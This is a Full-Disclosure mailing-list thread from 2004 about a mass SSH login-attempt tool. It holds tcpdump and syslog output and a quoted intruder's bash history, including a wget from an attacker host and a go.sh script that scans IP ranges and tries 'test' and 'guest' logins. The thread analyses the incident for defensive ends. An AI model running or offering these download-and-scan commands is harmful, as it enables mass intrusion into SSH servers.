I've tested the exploit on my Slack 10 box, OpenSSH_3.8.1p1, from my machine. The tcpdump output follows:
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes 22:38:56.177625 IP (tos 0x0, ttl 61, id 64319, offset 0, flags [DF], length: 60) 82.77.45.170.35528 > 213.157.171.49.22: S [tcp sum ok] 49755694:49755694 (0) win 5728 <mss 1432,sackOK,timestamp 272157969 0,nop,wscale 0> 22:38:56.190058 IP (tos 0x0, ttl 61, id 64320, offset 0, flags [DF], length: 52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 1 win 5728 <nop,nop,timestamp 272157985 647644964> 22:38:56.239677 IP (tos 0x0, ttl 61, id 64321, offset 0, flags [DF], length: 52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 26 win 5728 <nop,nop,timestamp 272158015 647644979> 22:38:56.239897 IP (tos 0x0, ttl 61, id 64322, offset 0, flags [DF], length: 72) 82.77.45.170.35528 > 213.157.171.49.22: P [tcp sum ok] 1:21(20) ack 26 win 5728 <nop,nop,timestamp 272158015 647644979> 22:38:56.295474 IP (tos 0x0, ttl 61, id 64323, offset 0, flags [DF], length: 204) 82.77.45.170.35528 > 213.157.171.49.22: P 21:173(152) ack 634 win 6688 <nop,nop,timestamp 272158084 647645031> 22:38:56.347138 IP (tos 0x0, ttl 61, id 64324, offset 0, flags [DF], length: 196) 82.77.45.170.35528 > 213.157.171.49.22: P 173:317(144) ack 634 win 6688 <nop,nop,timestamp 272158136 647645122> 22:38:56.419528 IP (tos 0x0, ttl 61, id 64325, offset 0, flags [DF], length: 68) 82.77.45.170.35528 > 213.157.171.49.22: P [tcp sum ok] 317:333(16) ack 1098 win 7904 <nop,nop,timestamp 272158209 647645166> 22:38:56.476041 IP (tos 0x0, ttl 61, id 64326, offset 0, flags [DF], length: 104) 82.77.45.170.35528 > 213.157.171.49.22: P 333:385(52) ack 1098 win 7904 <nop,nop,timestamp 272158264 647645246> 22:38:56.490631 IP (tos 0x0, ttl 61, id 64327, offset 0, flags [DF], length: 136) 82.77.45.170.35528 > 213.157.171.49.22: P 385:469(84) ack 1150 win 7904 <nop,nop,timestamp 272158278 647645263> 22:38:56.506077 IP (tos 0x0, ttl 61, id 64328, offset 0, flags [DF], length: 104) 82.77.45.170.35528 > 213.157.171.49.22: P 469:521(52) ack 1234 win 7904 <nop,nop,timestamp 272158302 647645285> 22:38:56.506232 IP (tos 0x0, ttl 61, id 64329, offset 0, flags [DF], length: 52) 82.77.45.170.35528 > 213.157.171.49.22: F [tcp sum ok] 521:521(0) ack 1234 win 7904 <nop,nop,timestamp 272158302 647645285> 22:38:56.511642 IP (tos 0x0, ttl 61, id 62364, offset 0, flags [DF], length: 60) 82.77.45.170.35529 > 213.157.171.49.22: S [tcp sum ok] 53755391:53755391 (0) win 5728 <mss 1432,sackOK,timestamp 272158307 0,nop,wscale 0> 22:38:56.525150 IP (tos 0x0, ttl 61, id 64330, offset 0, flags [DF], length: 52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 522:522(0) ack 1235 win 7904 <nop,nop,timestamp 272158310 647645295> 22:38:56.528352 IP (tos 0x0, ttl 61, id 62365, offset 0, flags [DF], length: 52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 1 win 5728 <nop,nop,timestamp 272158324 647645298> 22:38:56.538958 IP (tos 0x0, ttl 61, id 62366, offset 0, flags [DF], length: 52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 26 win 5728 <nop,nop,timestamp 272158333 647645317> 22:38:56.539178 IP (tos 0x0, ttl 61, id 62367, offset 0, flags [DF], length: 72) 82.77.45.170.35529 > 213.157.171.49.22: P [tcp sum ok] 1:21(20) ack 26 win 5728 <nop,nop,timestamp 272158333 647645317> 22:38:56.584001 IP (tos 0x0, ttl 61, id 62368, offset 0, flags [DF], length: 204) 82.77.45.170.35529 > 213.157.171.49.22: P 21:173(152) ack 634 win 6688 <nop,nop,timestamp 272158363 647645329> 22:38:56.661544 IP (tos 0x0, ttl 61, id 62369, offset 0, flags [DF], length: 196) 82.77.45.170.35529 > 213.157.171.49.22: P 173:317(144) ack 634 win 6688 <nop,nop,timestamp 272158452 647645411> 22:38:56.744357 IP (tos 0x0, ttl 61, id 62370, offset 0, flags [DF], length: 68) 82.77.45.170.35529 > 213.157.171.49.22: P [tcp sum ok] 317:333(16) ack 1098 win 7904 <nop,nop,timestamp 272158504 647645479> 22:38:56.799022 IP (tos 0x0, ttl 61, id 62371, offset 0, flags [DF], length: 104) 82.77.45.170.35529 > 213.157.171.49.22: P 333:385(52) ack 1098 win 7904 <nop,nop,timestamp 272158592 647645571> 22:38:56.811454 IP (tos 0x0, ttl 61, id 62372, offset 0, flags [DF], length: 136) 82.77.45.170.35529 > 213.157.171.49.22: P 385:469(84) ack 1150 win 7904 <nop,nop,timestamp 272158601 647645586> 22:38:56.832211 IP (tos 0x0, ttl 61, id 62373, offset 0, flags [DF], length: 104) 82.77.45.170.35529 > 213.157.171.49.22: P 469:521(52) ack 1234 win 7904 <nop,nop,timestamp 272158623 647645606> 22:38:56.832365 IP (tos 0x0, ttl 61, id 62374, offset 0, flags [DF], length: 52) 82.77.45.170.35529 > 213.157.171.49.22: F [tcp sum ok] 521:521(0) ack 1234 win 7904 <nop,nop,timestamp 272158623 647645606> 22:38:56.850483 IP (tos 0x0, ttl 61, id 62375, offset 0, flags [DF], length: 52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 522:522(0) ack 1235 win 7904 <nop,nop,timestamp 272158638 647645621> And this is the syslog entry: Jul 29 22:38:56 master sshd[29520]: Illegal user test from 82.77.45.170 Jul 29 22:38:56 master sshd[29520]: Failed password for illegal user test from 82.77.45.170 port 35528 ssh2 Jul 29 22:38:56 master sshd[29522]: Illegal user guest from 82.77.45.170 Jul 29 22:38:56 master sshd[29522]: Failed password for illegal user guest from 82.77.45.170 port 35529 ssh2 Can anyone figure it out? Intr-un mail de pe data de Thursday 29 July 2004 19:38, Stefan Janecek povestea: > Hmmm - I have also been getting those login attemps, but thought them to > be harmless. Maybe they are not *that* harmless, though... Today I > managed to get my hands on a machine that was originating such login > attempts. I must admit I am far from being a linux security expert, but > this is what I've found out up to now: > > Whoever broke into the machine did not take any attempts to cover up his > tracks - this is what I found in /root/.bash_history: > > ------ > id > uname -a > w > id > ls > wgte frauder.us/linux/ssh.tgz > wget frauder.us/linux/ssh.tgz > tar xzvf ssh.tgz > tar xvf ssh.tgz > ls > cd ssh > ls > ./go.sh 195.178 > ls > pico uniq.txt > vi uniq.txt > ls > rm -rf uniq.txt > ./go.sh 167.205 > ls > rm -rf uniq.txt vuln.txt > ./go.sh 202.148.20 > ./go.sh 212.92 > ./go.sh 195.197 > ./go.sh 147.32 > ./go.sh 213.168 > ./go.sh 134.176 > ./go.sh 195.83 > ------ > > um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two > binaries: > > go.sh: > ------- > ./ss 22 -b $1 -i eth0 -s 6 > cat bios.txt |sort | uniq > uniq.txt > ./sshf > ------- > > * 'ss' apparently is some sort of portscanner > * 'sshf' connects to every IP in uniq.txt and tries to log in as user > 'test' first, then as user 'guest' (according to tcpdump). > > This does not seem to be a stupid brute force attack, as there is only > one login attempt per user. Could it be that the tool tries to exploit > some vulnerability in the sshd, and just tries to look harmless by using > 'test' and 'guest' as usernames? > > The compromised machine was running an old debian woody installation > which had not been upgraded for at least one year, the sshd version > string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10' > > As already mentioned, I am far from being an expert, but if I can assist > in further testing, then let me know. Please CC me, I am not subscribed > to the list. > > cheers, > Stefan > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html -- *:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-. Andrei Galca-Vasiliu Folio Q Advertising www.fq.ro Security is an illusion... *:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
